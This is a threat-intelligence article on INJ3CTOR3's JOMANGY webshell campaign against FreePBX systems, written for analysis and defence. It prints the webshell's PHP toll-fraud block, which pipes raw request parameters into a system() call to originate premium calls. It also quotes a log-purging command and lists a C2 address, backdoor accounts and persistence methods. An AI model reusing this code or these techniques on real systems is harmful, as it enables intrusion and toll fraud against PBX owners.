Telecom Under Siege: Infamous Hacking Group Resurges with Stealthy “JOMANGY” Malware to Hijack Enterprise VoIP Networks for Toll Fraud

Financially motivated threat groups targeting Voice over IP (VoIP) infrastructure represent a persistent, highly specialized segment of the threat landscape. Since 2019, the threat actor known as INJ3CTOR3 has continuously exploited internet-exposed private branch exchange (PBX) systems for toll fraud. The group’s latest operation introduces a highly sophisticated multi-stage Bash dropper, a previously undocumented PHP webshell family dubbed JOMANGY, and an intricate, self-healing persistence architecture engineered to render conventional, linear remediation efforts entirely ineffective.

Initial Access Vector Analysis: The Restapps Anachronism vs. Modern CVE Candidates

Forensic analysis of the earliest stage artifact—a 23,355-byte Bash dropper (b506fc82)—indicates that while the exact exploitation payload remains unrecovered, infrastructure signals point directly to two critical FreePBX vulnerabilities:

  • CVE-2025-64328: A post-authentication command-injection vulnerability in the FreePBX Filestore module (CVSS 8.6), which previously served as the primary entry point for INJ3CTOR3’s January 2026 campaign.
  • CVE-2025-57819: A pre-authentication SQL injection vulnerability in the Endpoint module that allows attackers to insert malicious tasks into the internal cron_jobs table.

Architectural evidence strongly favors CVE-2025-57819 as the primary entry vector for this iteration. While the actor’s previous campaign explicitly disabled the Endpoint module post-exploitation, this variant leaves it fully operational, indicating that its functionality remains necessary to maintain the initial exploitation chain.

Interestingly, every stage of the current payload executes an Apache HTTPd log-purging command targeting the string restapps (sed -i '/restapps/d'). This does not correlate with the exploitation path of either 2025 vulnerability. Instead, it represents a legacy behavioral artifact carried forward from the group’s 2022 campaign, which heavily relied on CVE-2021-45461 (a Rest Phone Apps module remote code execution vulnerability). While this behavioral continuity provides high-confidence telemetry for long-term actor tracking, it functions purely as an anachronism in the 2026 campaign.

Multi-Stage Staging and Campaign Architecture

The deployment payload runs through three distinct Bash execution phases to orchestrate a complete system takeover. Stage 1 handles initialization, environmental sanitization, and endpoint hardening. Stage 2 (k.php) introduces the JOMANGY webshell framework and writes an un-obfuscated PHP command executor (license.php) to disk via the FreePBX High Availability (HA) module hooks. Stage 3 (wr.php) operates in parallel, deploying legacy ZenharR webshell variants to separate segments of the web root to expand the operational surface area.

[Initial Exploitation (CVE-2025-57819 / CVE-2025-64328)]
                        │
                        ▼
           [Stage 1: Bash Dropper (b506fc82)]
         (Eviction, Accounts, Profile Injection)
                        │
                        ▼
             [Stage 2: k.php (Bash)]
         (Deploys JOMANGY Webshell / .htaccess)
                        │
         ┌──────────────┴──────────────┐
         ▼                             ▼
  [license.php]               [Stage 3: wr.php (Bash)]
  (PHP Executor)             (Deploys ZenharR Webshell)

During Stage 1, the script establishes credential implantation across several layers. It injects a backdoor administrator account (freepbxusers) directly into the underlying MySQL database instance, hardcoding an admin privilege string (sections=*). Concurrently, it spawns 18 rogue operating system accounts. To bypass standard operational audits, nine of these accounts are assigned root-equivalent UID-0 status, while the remainder blend into the environment by mimicking legitimate service accounts like asterisk, asteriskuser, and spamfilter.

Inside JOMANGY: Double-Layer Obfuscation and Toll Fraud Operations

The JOMANGY webshell family showcases an evolutionary leap in the operator’s evasion tactics, achieving an initial zero-detection result on automated submission engines. The payload uses a double-layer static obfuscation wrapper: an outer Base64 layer encodes a PHP stub that applies str_rot13() to a second encoded layer and then hands the result to eval(). Security tools that perform only a single-pass Base64 decode recover ROT13-scrambled text rather than actionable PHP source code, so trivial signature matching fails.
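To show why a single-pass decoder fails, here is an added Python example (not code from the article or from the malware) that rebuilds the described Base64 / ROT13 / Base64 layering around a constructed placeholder body and then peels it back layer by layer. The exact stub layout (eval(base64_decode(str_rot13(...)))) and the placeholder body are assumptions; only the trace watermark comment, quoted later in the article, is taken from the page.

```python
import base64
import codecs
import re

# Watermark comment the article reports in every JOMANGY runtime instance.
WATERMARK = "/* trace_e1ebf9066a951be519a24140711839ea */"

# Constructed stand-in for the shell body; only the watermark is taken from the article.
INNER_SOURCE = WATERMARK + '\n<?php echo "constructed placeholder"; ?>'

def build_sample_wrapper(inner: str) -> str:
    """Reproduce the described layering for the sample only:
    body -> Base64 -> ROT13 -> str_rot13()/eval() stub -> Base64 (assumed stub layout)."""
    rot = codecs.encode(base64.b64encode(inner.encode()).decode(), "rot13")
    stub = 'eval(base64_decode(str_rot13("' + rot + '")));'
    return base64.b64encode(stub.encode()).decode()

def single_pass_decode(wrapper: str) -> str:
    """What a one-shot Base64 decoder sees: the stub, never the shell body."""
    return base64.b64decode(wrapper).decode()

def inner_literal(wrapper: str) -> str:
    """The string literal handed to str_rot13() inside the outer layer."""
    m = re.search(r'str_rot13\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)',
                  single_pass_decode(wrapper))
    if not m:
        raise ValueError("no str_rot13() literal in outer layer")
    return m.group(1)

def naive_inner_decode(wrapper: str) -> bytes:
    """Base64-decoding the inner literal without undoing ROT13: valid alphabet, junk bytes."""
    return base64.b64decode(inner_literal(wrapper))

def unwrap_jomangy(wrapper: str) -> str:
    """Peel both layers: outer Base64, then ROT13 and Base64 on the inner literal."""
    return base64.b64decode(codecs.decode(inner_literal(wrapper), "rot13")).decode()

def is_jomangy(source: str) -> bool:
    """Signature check that only works on the fully decoded source."""
    return WATERMARK in source

SAMPLE_WRAPPER = build_sample_wrapper(INNER_SOURCE)
```

Running is_jomangy() on single_pass_decode() output returns False while the fully unwrapped source matches, which is the gap the obfuscation exploits.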

Furthermore, the outer wrapper integrates structural dead-code insertion blocks targeting heuristic detection subroutines. A hardcoded watermark comment is injected into every runtime instance:

/* trace_e1ebf9066a951be519a24140711839ea */

This string serves as a uniform campaign signature across all victim environments. Post-authentication, the primary objective of the web panel is the direct execution of telecom toll fraud. All JOMANGY and ZenharR instances contain an integrated VoIP translation module that bypasses the PBX graphical interface to interact directly with the local Asterisk subsystem via shell invocation:

if (isset($_REQUEST['call'])) {
    system('asterisk -rx "channel originate Local/'
        . $_REQUEST['prs'] . $_REQUEST['num']
        . '@' . $_REQUEST['context']
        . ' application wait '
        . $_REQUEST['time'] . '"');
}

By supplying raw parameters for the destination country code (prs), number (num), dialplan context, and duration, the operators force the victim’s own Session Initiation Protocol (SIP) trunks to originate calls to premium-rate outbound networks controlled by the fraud syndicate, routing the financial liability entirely to the victim’s carrier invoice.
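Because $_REQUEST accepts these parameters from a plain GET, an originate call leaves a recognisable parameter tuple in the web server's access log. The following added Python example (not from the article) triages Apache combined-format lines for that tuple; the log lines, addresses, paths and numbers are constructed, and the check is deliberately not tied to a .php extension since the shells sit behind rewrite rules.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the quoted call module reads; prs and time are optional in the check.
REQUIRED = {"call", "num", "context"}

# Apache combined log format, only the fields needed for triage.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def triage_line(line: str):
    """Return a finding when a request carries the originate tuple, else None.
    Only GET query strings are visible here; $_REQUEST also accepts POST bodies,
    which need request-body logging or a WAF to observe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    q = parse_qs(parts.query, keep_blank_values=True)
    # 'call' alone is common in legitimate apps; require the destination fields too.
    if not REQUIRED <= set(q):
        return None
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "path": parts.path,  # not filtered on .php: shells sit behind rewrite rules
        "number": q.get("prs", [""])[0] + q.get("num", [""])[0],
        "context": q["context"][0],
        "duration": q.get("time", [""])[0],
        "status": int(m.group("status")),
    }

def triage_log(lines):
    """Findings for every line that carries the originate tuple."""
    return [hit for hit in map(triage_line, lines) if hit]

# Constructed sample log lines; addresses, paths, dates and numbers are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Feb/2026:03:12:44 +0000] "GET /admin/assets/x.php?call=1'
    '&prs=00&num=123456789&context=from-internal&time=60 HTTP/1.1" 200 51 "-" "curl/8.0"',
    '198.51.100.4 - - [14/Feb/2026:03:13:01 +0000] "GET /admin/config.php?display=dashboard'
    ' HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Feb/2026:03:14:10 +0000] "GET /api/status.php?call=status'
    ' HTTP/1.1" 200 12 "-" "curl/8.0"',
]
```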

The Six-Fold Persistence Architecture

The defining characteristic of this generation of INJ3CTOR3 infrastructure is its self-healing, cross-protecting persistence topology. Rather than relying on a solitary execution hook, the campaign weaves six distinct channels into an interdependent mesh where any single surviving component will fully restore the compromise within minutes:

Persistence Channel | Mechanism of Action & Defense Layer
1. Primary Cron Polling | Installs 8 separate cron jobs polling the C2 infrastructure (45.95.147.178) every 1 to 3 minutes, executing payloads under randomized system binary paths.
2. Shell Profile Injection | Appends Base64-encoded download stagers into /root/.bash_profile, /root/.bashrc, and /etc/rc.local, executing on every interactive root login or hardware reboot.
3. Immutable Cron Backups | Mirrors the active crontab across 8 hidden directories, applying the filesystem immutable flag (chattr +i). Supported by two internal validation loops that overwrite active crontabs if altered.
4. Process Watchdog | Runs continuous pgrep checks against the primary beacon process structures (zen2 / devnull2). Triggers an immediate C2 payload pull if the processes are terminated.
5. Monitored Webshell Tree | Spreads JOMANGY across more than 12 discrete paths protected by explicit .htaccess rewrite rules and chattr +i attributes. Each shell can trigger a full cron reinstall upon receiving an HTTP request.
6. FreePBX HA Module Hook | Plants the un-obfuscated license.php command executor inside the High Availability module path, supplying a continuous backdoor hook directly through legitimate framework tasks.

Ecosystem Dynamics: Automated Botnet Migration

INJ3CTOR3 maintains rigid control over its operational perimeter through an aggressive “competitor eviction” sequence executed during Stage 1. The dropper sweeps local directories against approximately 50 known competitor webshell signatures (including b374k, t3rr0r, and b3d0r), while applying strict bidirectional iptables rules to drop traffic from 11 rival Command and Control (C2) IP blocks.

Remarkably, this eviction routine explicitly targets the group’s own prior campaign infrastructure. Stage 1 searches for and deletes the unique marker string (bm2cjjnRXac1WW3KT7k6MKTR) and the “VictamPbx” webshell branding that characterized INJ3CTOR3’s own January 2026 campaign. Furthermore, the group’s former Brazilian C2 IP (45.234.176.202) is placed into the localized network drop list. This configuration proves that the campaign is not an incidental compromise wave, but a coordinated, automated botnet migration designed to shift compromised assets from old Brazilian nodes onto new Dutch infrastructure hosted at 45.95.147.178.

Our Opinion on the INJ3CTOR3 Campaign

The 2026 INJ3CTOR3 campaign underscores a critical, often underestimated reality in enterprise security: the severe vulnerability of specialized telecom infrastructure. While standard Endpoint Detection and Response (EDR) matrices heavily police traditional corporate operating systems, Linux-based PBX and VoIP appliances remain significant blind spots.

The architectural sophistication demonstrated in the JOMANGY deployment reveals a clear understanding of typical incident response patterns. By establishing six interlocking persistence channels, the operators are explicitly banking on the superficial nature of standard remediation. Most security teams, when alerted to an anomaly, identify and kill the active malicious process or delete the immediate webshell file. In this environment, such linear steps are useless; the immutable crontab backups or the profile injection scripts will simply revive the entire infection loop within a few clock cycles.

Furthermore, the automated botnet migration highlights the long operational life of these compromises. The fact that the threat actor can systematically evict their own legacy 2026 infrastructure across hundreds of hosts shows that they treat these enterprise networks as stable, long-term operational real estate. Patching security flaws like CVE-2025-57819 closes the front door, but it does absolutely nothing to evict an actor who has already thoroughly reconfigured the underlying OS persistence mechanisms.

Ultimately, this campaign proves that once a PBX host is compromised by a disciplined actor like INJ3CTOR3, incremental cleanup is a failing strategy. The only reliable path to remediation is to completely burn down the host, provision a clean baseline from verified media, apply immediate updates, and isolate the management layer from the public internet.